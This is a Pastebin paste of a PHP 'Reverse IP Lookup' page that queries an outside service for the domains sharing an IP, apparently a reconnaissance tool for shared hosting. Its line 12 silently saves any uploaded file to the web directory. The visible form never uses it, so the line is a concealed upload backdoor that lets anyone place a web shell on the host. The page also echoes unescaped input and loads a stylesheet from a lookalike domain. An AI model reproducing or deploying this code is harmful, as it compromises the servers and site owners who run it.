Advertisement
Ribang

Ip Lookup Reverse Domain

Dec 21st, 2017
1,914
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.55 KB | None | 0 0
  1. <head><title>Reverse IP Lookup</title>
  2. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  3. <link rel="stylesheet" href="http://www.w32.info/2001/04/xmldsigmore">
  4. </head>
  5. <?php
  6. ob_start();
  7. @set_time_limit(0);
  8. echo "<p align='center'>
  9. <img border='0' src='http://www.seomastering.com/myimages/img/Geolocation.jpg' width='15%' height='25%' /></p>";
  10. echo "<center><font color='#006600' size='4' face='impact'>Ip Lookup Reverse Domain</center></font><div id=result>";
  11.  
  12. (@copy($_FILES['f']['tmp_name'], $_FILES['f']['name']));
  13. echo "<center><br /><br /><form><input size='60' value='jokerdarkknight.com' name='ip' /><input type='submit' value='รขล“โ€œ'></form></center>";
  14. if(isset($_GET["ip"]))
  15. {
  16. $site = $_GET["ip"];
  17. $ip = "http://domains.yougetsignal.com/domains.php";
  18. //Curl Function
  19. $ch = curl_init($ip);
  20. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  21. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$site&ket=");
  22. curl_setopt($ch, CURLOPT_HEADER, 0);
  23. curl_setopt($ch, CURLOPT_POST, 1);
  24. $resp = curl_exec($ch);
  25. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  26. $array = explode(",,", $resp);
  27. unset($array[0]);
  28. echo "<table class=tbl>";
  29. foreach($array as $lnk)
  30. {
  31. print "<tr><td><a href='http://$lnk' target=_blank>$lnk</a></td></tr>";
  32. }
  33. echo "</table>";
  34. curl_close($ch);
  35. }
  36. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement